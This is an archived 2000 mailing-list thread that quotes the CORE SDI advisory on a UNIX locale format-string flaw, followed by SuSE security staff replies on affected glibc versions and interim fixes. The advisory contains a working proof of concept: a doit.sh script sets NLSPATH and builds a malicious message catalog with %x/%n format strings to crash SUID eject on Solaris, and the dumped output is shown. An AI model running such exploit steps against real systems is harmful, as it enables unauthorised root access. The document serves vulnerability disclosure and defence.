Is SuSE vulnerable to this? I know RedHat is HUGELY vulnerable..
Delivered-To: petern@itaudit.com.au Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: BUGTRAQ@SECURITYFOCUS.COM Lines: 302 X-Mailer: Mozilla 4.72 [en] (WinNT; I) X-Accept-Language: en Date: Mon, 4 Sep 2000 21:07:14 -0300 Reply-To: Iván Arce <core.lists.bugtraq@CORE-SDI.COM> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: Iván Arce <core.lists.bugtraq@CORE-SDI.COM> Organization: CORE SDI S.A. Subject: UNIX locale format string vulnerability To: BUGTRAQ@SECURITYFOCUS.COM
CORE SDI http://www.core-sdi.com
UNIX locale format string vulnerability
Date Published: September 4th, 2000 (early release)
Advisory ID: CORE-090400
Bugtraq ID: 1634
CVE CAN: None currently assigned.
Title: UNIX locale format string vulnerability
Class: Input Validation Error
Remotely Exploitable: Yes (on some systems)
Locally Exploitable: Yes
Vulnerability Description:
This report is being released earlier (it was originally scheduled for Sept 11th., 2000) due to the fact that information regarding the vulnerability has been made public by several vendors.
Many UNIX operating systems provide internationalization support according to the X/Open XPG3, XPG4 and Sun/Uniforum specifications using the of the locale subsystem. The locale subsystem comprises a set of databases that store language and country specific information and a set of library functions used to store, retrieve and generally manage that information.
In particular a database with messages used by almost all the operating system programs is keep for each supported language.
The programs access this database using the gettext(3), dgettext(3), dcgettext(3) C functions (Sun/Uniforum specifications) or catopen(3), catgets(3) and catclose(3) ( X/Open XPG3 and XPG4 specification).
Generally a program that needs to display a message to the user will obtain the proper language specific string from the database using the original message as the search key and printing the results using the printf(3) family of functions. By building and installing a custom messages database an attacker can control the output of the message retrieval functions that get feed to the printf(3) functions.
Bad coding practices and the ability to feed format strings to the later functions makes it possible for an attacker to execute arbitrary code as a privileged user (root) using almost any SUID program on the vulnerable systems.
Alternatively, on some operating systems, the problem can be exploited remotely using the environment variable passing options in telnetd. However, a remote attacker must be able to place the suitable messages database on the target host (i.e. anonymous ftp, NFS, email, etc.)
Vulnerable Packages/Systems:
Sun Microsystems Inc. Solaris 2.x, Solaris 7, Solaris 8 (x86 and Sparc architectures)
Silicon Graphics Inc. IRIX 6.2 to 6.5.8
Linux RedHat Linux Debian Linux Conectiva Linux 4.0 or higher All supported versions of Conectiva Linux use Glibc 2.1.1 which explicity checks and ignores the NLSPATH environment variable if the catopen() and catgets() functions are called from a SUID executable. Verified and reported by Andreas Hasenak <andreas@conectiva.com.br>
Although the above text is the result of research and email communications that took place during the last 2 weeks, the release of security advisories from RedHat, Debian and Conectiva Linux acknowledging the existence of the problem seems to probe otherwise.
Suspected vulnerable [not checked] AIX HP-UX Tru64 (Digital Unix) SCO OpenServer SCO Unixware
Systems not vulnerable
OpenBSD As reported by Theo deRaadt <deraadt@openbsd.org>
FreeBSD As reported by Kris Kennaway <kris@FreeBSD.org>
FreeBSD does not allow the use of the NLSPATH environment variable in privileged (SUID) applications.
FreeBSD can not be exploited remotely either, since the /usr/bin/login program does not use the cat* functions and is SUID root.
Solution/Vendor Information/Workaround:
RedHat Linux Refer to the REdHAt Linux announce: http://www.securityfocus.com/archive/1/79944 Debian Linux Obtain patches from http//www.debian.org/security Refer to the Debian announce: http://www.securityfocus.com/archive/1/79943 Conectiva Linux Refer to the Conectiva Linux announce http://www.securityfocus.com/archive/1/79960 Other vendors Contact vendor for a fix
Vendor notified on: All vendors were notified on August 22nd, 2000
Credits:
This vulnerability was discovered by Ivan Arce of CORE SDI S.A., Buenos Aires, Argentina.
This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp@securityfocus.com.
Technical Description - Exploit/Concept Code:
Passing unchecked user supplied data as a format string to the printf(3) functions can lead to unexpected changes of flow control and execution of arbitrary code in context of the vulnerable program. The following C program exemplifies the problem described:
-----sample.c----- void main(int argc, char **argv) { /* This is proper use */ printf("%s\n",argv[1]); /* This is bad use */ printf(argv[1]); printf("\n"); } ------------------ In the above example if argv[1] is a string with characters interpreted by printf(3) as formatting characters, the behavior of the program can be altered to execute arbitrary code in a way _similar_ to the exploitation of buffer overflow vulnerabilities:
$ cc -o sample sample.c $ ./sample hello hello hello $ ./sample %x%x%x%x%x%n%n%n%n%n%n%n%n%n %x%x%x%x%x%n%n%n%n%n%n%n%n%n Memory fault (core dumped) $
Recent posts to computer security lists and related publications provide good reference material to understand the problem and possible ways to exploit it.
It has been found that most programs in many popular operating systems suffer from this problem derived from the way the messages database of the locale subsystem is used. In particular, privileged programs (programs with the SUID bit set) that execirse access to the database using the gettext(3) function in a vulnerable manner are directly exploitable and allow an attacker to obtain root privileges instantly. The following code exemplifies a common bad coding practice that makes the cited programs vulnerable:
main(int argc, char **argv) { if(argc > 1) { printf(gettext("usage: %s filename\n"),argv[0]); exit(0); } printf("normal execution proceeds...\n"); }
Here the output of the gettext(3) function is not validated and passed directly to printf(3). gettext(3) searches the messages database for a message that matches the key "usage: %s filename\n" in the current locale settings and returns it to the caller. A malicious, unprivileged, user can build and install a bogus messages database and instruct the vulnerable program to use it, thus controlling the output of gettext() and force-feeding formatting characters to printf(3). The problem above is NOT related to the user input to the program but instead to the data contained in the messages database.
The following commands demonstrates the problem:
$ uname -a SunOS maul 5.7 Generic_106541-02 sun4m Sparc SUNW,SPARCstation-5 $ ls -l $ ls -l /usr/bin/eject -r-sr-xr-x 1 root bin 14352 Oct 6 1998 /usr/bin/eject $ eject -x`perl -e 'print "ABCDEF". "A"x507` eject: illegal option -- x usage: eject [-fndq] [name | nickname] options: -f force eject -n show nicknames -d show default device -q query for media present -p do not call eject_popup $ cat >doit.sh #!/bin/ksh export NLSPATH=:`pwd` echo domain \"messages\" > messages.po echo msgid \""usage: %s [-fndq] [name | nickname]\\\n"\" >> messages.po echo msgstr \"`perl -e 'print "%x"x112 . "%n"'`\" >> messages.po msgfmt messages.po cp messages.mo SUNW_OST_OSCMD cp messages.mo SUNW_OST_OSLIB exec eject -x`perl -e 'print "ABCDEF" . "A"x507'` ^D $ ./doit.sh eject: illegal option -- x effffba47efefeff1ff00ef735a38effffba4000447ef7fca782effffac4129642326c00effffa60 115083effffac44effffad05effffb2c002effffac4effffad023000000000000000000000002eff ffba4effffbaa0effffdaeeffffdbfeffffdd5effffdf1effffdf8effffe10effffe2eeffffe9aef fffebeeffffed0effffedeeffffef2efffff0befffff20efffff33efffff42efffff5aefffff72ef ffff7defffff94efffff9defffffaf07d8efffffd67deefffffea3100344205591142c7ef7d00008 0610007d007d13ee7d217d317d9300656a656374002d78Segmentation Fault $ exit
As shown, the SUID program 'eject' follows the user directives to use a custom (bogus) messages database. The specific way to do it vary in different operating systems but usually involves the usage of environment variables (NLSPATH, LC_MESSAGES, LANG, etc.) and/or locale library functions (textdomain(3), bindtextdomain(3), etc.)
The problem however stems from bad coding practices in the operating system's programs: - A SUID program should not follow the users directives of what database it should use, locale databases should be taken from a secure trusted directory.
- Output of gettext(3) should not be passed as a format string directly to printf(3) functions.
References
A good reference for localization and internationalization is the "Programming for internationalization FAQ":
http://www.cs.ruu.nl/wais/html/na-dir/internationalization\ /programming-faq.html
Sections 3 and 5 describe the locale subsystem and the X/Open and Sun/Uniforum set of functions for language independent messages.
Format string bugs and exploitation are described in:
http://julianor.tripod.com/usfs.html http://julianor.tripod.com/kalou-formats.txt
Recent vulnerabilities involving format strings http://www.securityfocus.com/bid/1387 http://www.securityfocus.com/bid/1425 http://www.securityfocus.com/bid/1572
$Id: locale-advisory.txt,v 1.8 2000/09/04 17:14:51 iarce Exp $
-- "Understanding. A cerebral secretion that enables one having it to know a house from a horse by the roof on the house, It's nature and laws have been exhaustively expounded by Locke, who rode a house, and Kant, who lived in a horse." - Ambrose Bierce
==================[ CORE Seguridad de la Informacion S.A. ]========= Iván Arce Presidente PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A email : iarce@core-sdi.com http://www.core-sdi.com Pte. Juan D. Peron 315 Piso 4 UF 17 1038 Capital Federal Buenos Aires, Argentina. Tel/Fax : +(54-11) 4331-5402 Casilla de Correos 877 (1000) Correo Central =====================================================================
--- For a personal reply use iarce@core-sdi.com
Peter Nixon Senior Security Consultant IT Audit & Consulting (ITAC) Pty Ltd http://www.itaudit.com.au mailto:petern@itaudit.com.au
Is SuSE vulnerable to this? I know RedHat is HUGELY vulnerable..
We are. Some people may have noticed that there's a new shlibs.rpm package in the update directories on ftp.suse.com. This package does _NOT_ fix all currently know vulnerabilities in glibc, neither does the RedHat update packages, unfortunately. Expect SuSE update packages shortly, stay tuned! Roman. [snip]
CORE SDI http://www.core-sdi.com
UNIX locale format string vulnerability
[snip]
-- - - | Roman Drahtmüller <draht@suse.de> // "Caution: Cape does | SuSE GmbH - Security Phone: // not enable user to fly." | Nürnberg, Germany +49-911-740530 // (Batman Costume warning label) | - -
Hi there, A set of security vulnerabilities have been found in the current (as well as older) versions of the glibc that most modern Linux distributions are based on. All vendors (also those who have provided patches already) are currently working on fixed packages. Interim solution to the security problems: Disable _all_ sgid + suid applications on the system. Before doing that, make sure that you know all file modes of your programs so that you wil lbe able to restore them upon completing the glibc update procedure to be announced shortly: Record the relevant settings of your permissions as follows (command to be executed as root): find / -type f \( -perm +4000 -o -perm +2000 \) -ls > /find-suid-ls ------------------------------- In order not to be vulnerable to the know security problems of glibc, it would be necessary to remove all suid/sgid bits from your applications. This can be done in a fairly easy way using variations of the above find command such as: `find / -type f \( -perm +4000 -o -perm +2000 \) -exec chmod -s {} \;' Make sure that SuSEconfig (and `chkstat' therein) cannot be executed accidentially because the permissions would get reverted to the original (flawed) settings. Yast executes SuSEconfig after the package set configuration has been changed (after packages have been installed)! A solution like this might not be applicable to most installations in the wild. The update packages (to be released shortly) are the right solution in this case. Please follow the instructions in the security advisory to come. Thank you, Roman Drahtmüller. -- - - | Roman Drahtmüller <draht@suse.de> "Caution: Cape does not | SuSE GmbH - Security enable user to fly." | Nürnberg, Germany (Batman Costume warning label) | - -
/me guesses it will probably be sooner rather than later if we stop asking him questions.. rofl.. /Nix At 02:56 AM 9/5/2000 +0200, you wrote:
(to be released shortly)
how long? aprox
--------------------------------------------------------------------- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com
Peter Nixon Senior Security Consultant IT Audit & Consulting (ITAC) Pty Ltd http://www.itaudit.com.au mailto:petern@itaudit.com.au
Roman Drahtmueller wrote:
A set of security vulnerabilities have been found in the current (as well as older) versions of the glibc that most modern Linux distributions are based on.
As disabling all suid programs heavily effects our systems, it would be good to know if the vulnerabilities are only with local attackers or apply also to attacks from outside. Is that known? Best, Frank -- Dipl.-Inform. Frank Steiner mailto:fst@informatik.uni-kiel.de Lehrstuhl f. Programmiersprachen mailto:fsteiner@web.de CAU Kiel, Olshausenstraße 40 Phone: +49 431 880-7265, Fax: -7613 D-24098 Kiel, Germany http://www.informatik.uni-kiel.de/~fst/
A set of security vulnerabilities have been found in the current (as well as older) versions of the glibc that most modern Linux distributions are based on.
As disabling all suid programs heavily effects our systems, it would be good to know if the vulnerabilities are only with local attackers or apply also to attacks from outside. Is that known?
It's about local bugs only, as far as it's known by now.
Best, Frank
Grüße, Roman. -- - - | Roman Drahtmüller <draht@suse.de> "Caution: Cape does not | SuSE GmbH - Security enable user to fly." | Nürnberg, Germany (Batman Costume warning label) | - -
participants (4)
-
Frank Steiner
-
Nix
-
Roman Drahtmueller
-
Thilo Bangert